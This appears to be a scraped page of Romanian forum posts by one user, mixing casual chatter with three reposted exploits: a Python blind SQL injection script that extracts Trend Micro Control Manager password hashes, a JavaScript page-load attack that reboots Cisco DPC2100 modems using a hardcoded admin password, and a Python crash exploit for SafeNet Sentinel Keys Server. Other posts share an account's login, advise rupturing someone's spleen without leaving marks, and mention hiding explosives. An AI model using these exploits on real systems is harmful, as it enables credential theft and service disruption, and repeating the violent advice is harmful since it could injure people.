LLegoLLaS

BLU Tank Stand-by Up to 1720 h sau iti vand un Nokia E63 (pachet complet)

e ok omu,recomand

well...se putea incadra in autoaparare.Daca stii sa te lupti,imobilizeaza-l,rupe-i splina fara sa lasi urme

nu arzi nimic.Sistemul are amplificator.Eu am folosit sistemul meu de 200W la telefon. Probabil ai nevoie de adaptor Jack > RCA

da,netu fara telefon nu se poate

vouch

Salutare si bine ai venit

anyway,sa si-l bage-n cur

Mosul a ''declarat'' ca invingatorul va fi cel care va trece ultimul linia de sosire.E ca un joc al rabdarii,pare ok din partea mea treaba atsa

le-a spus sa ocoleasca pamantul? (singurul lucru la care ma pot gandi acum)

daca-mi spui ce jocuri sunt,poate te scap de unu'

decat sa-ti iei adaptoare si alte ragaieli mai bine pune un ban si ia o placa de baza

''ofer pret pe masura'' inseamna 10 euro?

buna iuby.Nu vomiti,fuge ciorba din tine inapoi in polonic

Python code: #!/usr/bin/env python # Exploit Title: Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth) # Disclosure Date: 09/27/2012 # Author: otoy (@otoy_rood) & modpr0be (@modpr0be) # Contact: research[at]spentera.com # Platform: Windows # Tested on: Windows 2003 Standard Edition # Software Link: http://www.trendmicro.com/ftp/products/tmcm/CM6_Package.zip # References: http://www.spentera.com/2012/09/trend-micro-control-manager-sql-injection-and-xss-vulnerability/ # CVE-ID: CVE-2012-2998 ### Software Description # Trend Micro Control Manager is a centralized security management for the enterprise. # The web-based management console tracks security performance, reports malware events and # policy violations, and automates routine tasks. New features include a customizable dashboard # and at-a-glance access to threat statistics from the Trend Micro Smart Protection Network, # Trend Micro's cloud-based security infrastructure. ### Vulnerability Details # Vulnerability found in AdHocQuery module inside the id parameter. By injecting payload after the # id parameter, let say ' WAITFOR DELAY '0:0:5'-- the web application hung for 5 seconds, # which gives us a conclusion that the web application is vulnerable to time-based sql injection. # The script below is just a proof of concept, you must get a cookie. This vulnerability will need some # attack vectors to be exploited, but it is still a vulnerability. # Remember to set the cookie first. ### Disclosure Timeline # 07/23/2012 - Bug found # 07/25/2012 - Reported to CERT/CC # 07/26/2012 - Reported to JPCERT/CC # 08/14/2012 - Vendor received the vulnerability # 09/20/2012 - Vendor acknowledged the vulnerability # 09/27/2012 - Public advisory released import sys,time,urllib,urllib2 print """ #===============================================================# | | | ___| | | | \___ \ __ \ _ \ __ \ __| _ \ __| _` | | | | | | __/ | | | __/ | ( | | | _____/ .__/ \___|_| _|\__|\___|_| \__,_| | | _| | | | | Trend Micro Control Manager BlindSQLi Password Extractor | | CVE-2012-2998 | | by otoy & modpr0be (research[at]spentera.com) | | | #===============================================================# """ host = raw_input("[+] Target IP: ") target = 'https://%s/webapp/AdHocQuery/AdHocQuery_Processor.aspx' %(host) #SQLi delay, for remote target increase the delay time (default: 2 seconds) delay=2 cookie = ("ASP_NET_SessionId=pazibiigfom13ijbaaqxxx55; .ASPXAUTH=582E40E7A78D452B18EF6719DE422CE121E3E7793E2FB661679753C1DCA50D9F7873CFF37BAF54AB3CCD84F5899D930A5D190F2C99552739F1C19FAF80F3EEE444951D0C9B7F6FD707E83BFC02ABD21D; WFINFOR=test") def Hex2Des(item): return ord(hex(item).replace('0x','')) def konek(m,n): #borrow from SQLmap query=("' IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(Password AS NVARCHAR(4000)),CHAR(32))) FROM db_ControlManager.dbo.tb_UserInfo" " WHERE CONVERT(NVARCHAR(4000),Password)>CHAR(32)),%s,1)) > %s) WAITFOR DELAY '0:0:%s'--" %(m,n,delay)) values = { 'Action': 'View', 'id': '350b651c-15c5-45ca-8d64-33b20f3fc4d8'+query, 'asc': 'true', 'Sort': 7, 'paging': 10 } url = "%s?%s" % (target, urllib.urlencode(values)) req = urllib2.Request(url) req.add_header('Cookie', cookie) try: starttime=time.time() response = urllib2.urlopen(req) endtime = time.time() return int(endtime-starttime) except: print '\n[-] Uh oh! Exploit fail..' sys.exit(0) print "[+] Using Time-Based method with %ds delay."%int(delay) print "[+] Starting to extract hash from the first user." sys.stdout.write('[+] Here is the hash : ') sys.stdout.flush() starttime = time.time() for m in range(1,33): for n in range(0,16): wkttunggu = konek(m,Hex2Des(n)) if (wkttunggu < delay): sys.stdout.write(chr(Hex2Des(n))) sys.stdout.flush() break endtime = time.time() print "\n[+] Done! Hash extracted in %d seconds" %int(endtime-starttime) sursa:bugsearch.net

ExploitFixes Cisco DPC2100 Denial of Service 2012-09-26 15:05:03 # Exploit Title: Cisco DPC2100 Denial of Service # Date: 09/01/2010 # Author: Daniel Smith # Software Link: Cisco Systems, Inc # Version: HW:2.1/SW:v2.0.2r1256-060303 # Tested on: OSX 10.6/Win7 # CVE: CVE-2011-1613 ======================================================= Information ======================================================= Executing this script on page load will cause the users modem to restart when they visit the page. This example uses javascript but can just as easily written to in another language to accomplish something similar. Attack consists of two parts. Part 1 - Privilege Escalation: POST: http://192.168.100.1/goform/_aslvl PARAMS: SAAccessLevel=2&SAPassword=W2402 Part 2 - Modem Restart: POST: http://192.168.100.1/goform/gscan PARAMS: SADownStartingFrequency=705000000 ======================================================= Proof of Concept (Javascript) ======================================================= (function() { var b=document.getElementsByTagName('body')[0]; var otherlib=false; if(typeof jQuery!='undefined') { console.log('This page already using jQuery v'+jQuery.fn.jquery); } else if (typeof $=='function') { otherlib=true; } function getScript(url,success){ var script=document.createElement('script'); script.src=url; var head=document.getElementsByTagName('head')[0], done=false; // Attach handlers for all browsers script.onload=script.onreadystatechange = function(){ if ( !done && (!this.readyState || this.readyState == 'loaded' || this.readyState == 'complete') ) { done=true; success(); script.onload = script.onreadystatechange = null; head.removeChild(script); } }; head.appendChild(script); } getScript('http://code.jquery.com/jquery-latest.min.js',function() { if (typeof jQuery=='undefined') { console.log('Sorry, but jQuery wasn\'t able to load'); } else { console.log('This page is now jQuerified with v' + jQuery.fn.jquery); $.post("http://192.168.100.1/goform/_aslvl", { SAAccessLevel: "2", SAPassword: "W2402" } ); console.log('Privilege Escalation: temporarily setting SAAccessLevel to \'2\'.'); $.post("http://192.168.100.1/goform/gscan", { SADownStartingFrequency: "705000000" } ); console.log('Reboot command sent.'); } }); })(); sursa:bugsearch

thanx pt filelist

user: LLegoLLaS pass: QPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxz/13 Like cine-l ia

# Exploit Title: SafeNet Sentinel Keys Server DoS # Date: 10 Sep 2012 # Exploit Author: retset (https://twitter.com/ret5et) # Vendor Homepage: http://www.safenet-inc.com/ # Version: Sentinel Protection Installer v7.6.5 (sntlkeyssrvr.exe ver. 1.3.1.3) # Download link: http://c3.safenet-inc.com/downloads/8/0/804F8C5F-F88F-4443-8871-2AD993DC33DB/Sentinel%20Protection%20Installer%207.6.5.exe # Download link: http://www.safenet-inc.com/support-downloads/sentinel-drivers/ # Tested on: Xp Sp3 import socket import sys if len(sys.argv) < 2: print "usage: %s host" % sys.argv[0] sys.exit(0) host = sys.argv[1] print host req = "#1" req += 'A' *0x4093 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,7002)) s.send(req) s.close() """ (5ec.6f0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=0045011c ecx=00000003 edx=00b6bf83 esi=00b70000 edi=0045011c eip=0040f89b esp=00b65864 ebp=0000407d iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe sntlkeyssrvr+0xf89b: 0040f89b f3a6 repe cmps byte ptr [esi],byte ptr es:[edi] """ sursa:bugsearch.net

dubios de multe detalii.Treburile astea nu trebuaiu sa fie confidentiale? Gen: Ba vezi ca maine la ora 8 iti sparg casa.Iti intru prin baie

sunt inca activ

ca sa obtii rezultatul care il spun ei ar trebui sa fie o cantitate mica de explozibil sub chipuri,detonata la apsarea butonului.

cei care au laptopuri....de la arhiva eu am 3 km intre logo si ma-ta